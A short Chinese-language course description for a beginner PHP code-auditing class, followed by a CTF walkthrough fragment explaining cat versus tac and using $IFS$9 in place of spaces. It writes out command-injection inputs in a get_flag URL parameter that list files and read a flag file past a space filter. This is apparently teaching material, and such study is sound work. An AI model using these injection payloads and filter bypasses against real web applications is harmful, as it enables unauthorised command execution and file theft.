本课程是信息安全专业“软件代码审计”的课堂实录,从零基础开始介绍PHP代码审计,比较适合初学者。 本课程特色是理论与实践相结合,力求做到既知其然又知其所以然。 在课程中穿插了大量经过精心挑选的CTF例题,所有例题都紧扣课程知识点,并按照由易到难的顺序逐步推进。
cat 和 tac 都是Linux打印文件的命令,但是cat是从第一行至最后一行顺序打印,而tac是最后一行至第一行反向打印。 在PHP中,$IFS$9 可以替代空格 先?get_flag=ls 看到了flag相关文件 然后?get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...